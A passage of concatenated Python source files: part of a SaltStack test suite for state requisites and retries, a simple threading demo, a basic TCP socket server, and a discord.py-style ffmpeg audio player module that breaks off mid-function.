'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif execution failed')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 resolution theses tests would maybe become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.fopen(tgt, 'r') as cheese:
data = cheese.read()
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immedietly (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
open(testfile, 'a').close() # pylint: disable=resource-leakage
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attmempt
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
|
08_4_threading_test.py
|
import threading
import time
print("hello world ----- 2021-04-06 starting")
def loop():
""" 新线程执行的代码"""
now_thread = threading.current_thread()
n = 0
while n < 5:
print('[loop]now thread name: {0}'.format(now_thread.name))
print(n)
time.sleep(2)
n += 1
def use_thread():
""" 使用线程来实现"""
# 当前正在执行的线程名称
now_thread = threading.current_thread()
print('now thread name: {0}'.format(now_thread.name))
t = threading.Thread(target=loop, name='loop_thread')
# 启动守护进程
# t.daemon = True
# 启动线程
t.start()
# 挂起线程
# t.join()
#print("hello world ----- 2021-04-06 ending")
if __name__ == "__main__":
use_thread()
print("hello world ----- 2021-04-06 ending")
|
server Non Blocking.py
|
import socket
import threading
from queue import Queue
sc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
port = 2000
def clientThread(clnt,queue,inst):
clnt.send(bytes("Connection Established.",'utf-8'))
while True:
if(not inst.empty):
clnt.send(bytes("start",'utf-8'))
while True:
message = clnt.recv(2048)
queue.put(message.decode('utf-8'))
if not message:
clnt.sendall(("Connection was closed due to no data.").encode('utf-8'))
break
clnt.close()
totalThreads = threading.active_count() -1
print(f"Total threads : {totalThreads}")
def printingThread(queue):
while True:
if(not queue.empty()):
print(queue.get())
try:
sc.bind((socket.gethostname(),port))
except Exception as e:
print(e)
sc.listen(100)
try:
mainQ = Queue()
instructionQueue= Queue()
printer= threading.Thread(target=printingThread,args=(mainQ,))
printer.start()
while True:
print("Waiting for connections")
client,addr = sc.accept()
print(f"Connection has been made to {addr}!")
t= threading.Thread(target=clientThread,args=(client,mainQ,instructionQueue,))
t.start()
totalThreads = threading.active_count()
print(f"Total threads : {totalThreads}\n")
except (KeyboardInterrupt,SystemExit):
cleanup_stop_thread()
sc.close()
sc.close()
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar("AT", bound="AudioSource")
FT = TypeVar("FT", bound="FFmpegOpusAudio")
_log = logging.getLogger(__name__)
__all__ = (
"AudioSource",
"PCMAudio",
"FFmpegAudio",
"FFmpegPCMAudio",
"FFmpegOpusAudio",
"PCMVolumeTransformer",
)
CREATE_NO_WINDOW: int
if sys.platform != "win32":
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
args: Any,
**subprocess_kwargs: Any,
):
piping = subprocess_kwargs.get("stdin") == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError(
"parameter conflict: 'source' parameter cannot be a string when piping to stdin"
)
args = [executable, *args]
kwargs = {"stdout": subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[Bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f"popen-stdin-writer:{id(self):#x}"
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(
target=self._pipe_writer, args=(source,), daemon=True, name=n
)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(" ")[0] if isinstance(args, str) else args[0]
raise ClientException(executable + " was not found.") from None
except subprocess.SubprocessError as exc:
raise ClientException(f"Popen failed: {exc.__class__.__name__}: {exc}") from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info("Preparing to terminate ffmpeg process %s.", proc.pid)
try:
proc.kill()
except Exception:
_log.exception("Ignoring error attempting to kill ffmpeg process %s", proc.pid)
if proc.poll() is None:
_log.info("ffmpeg process %s has not terminated. Waiting to terminate...", proc.pid)
proc.communicate()
_log.info(
"ffmpeg process %s should have terminated with a return code of %s.",
proc.pid,
proc.returncode,
)
else:
_log.info(
"ffmpeg process %s successfully terminated with return code of %s.",
proc.pid,
proc.returncode,
)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug(
"Write error for %s, this is probably not a problem", self, exc_info=True
)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def check_streams(self) -> None:
if self._process is MISSING or self._stdout is MISSING or self._stdin is MISSING:
raise ValueError("FFmpegAudio cannot be read more than once")
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
args.extend(("-f", "s16le", "-ar", "48000", "-ac", "2", "-loglevel", "warning"))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
# self.check_streams()
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = "ffmpeg",
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
codec = "copy" if codec in ("opus", "libopus") else "libopus"
args.extend(
(
"-map_metadata",
"-1",
"-f",
"opus",
"-c:a",
codec,
"-ar",
"48000",
"-ac",
"2",
"-b:a",
f"{bitrate}k",
"-loglevel",
"warning",
)
)
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get("executable")
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or "native"
executable = executable or "ffmpeg"
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, "_probe_codec_" + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError(
"Expected str or callable for parameter 'probe', "
f"not '{method.__class__.__name__}'"
)
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + "probe" if executable in ("ffmpeg", "avconv") else executable
args = [
exe,
"-v",
"quiet",
"-print_format",
"json",
"-show_streams",
"-select_streams",
"a:0",
source,
]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data["streams"][0]
codec = streamdata.get("codec_name")
bitrate = int(streamdata.get("bit_rate", 0))
bitrate = max(round(bitrate / 1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
args = [executable, "-hide_banner", "-i", source]
proc = subprocess.Popen(
args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
out, _ = proc.communicate(timeout=20)
output = out.decode("utf8")
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
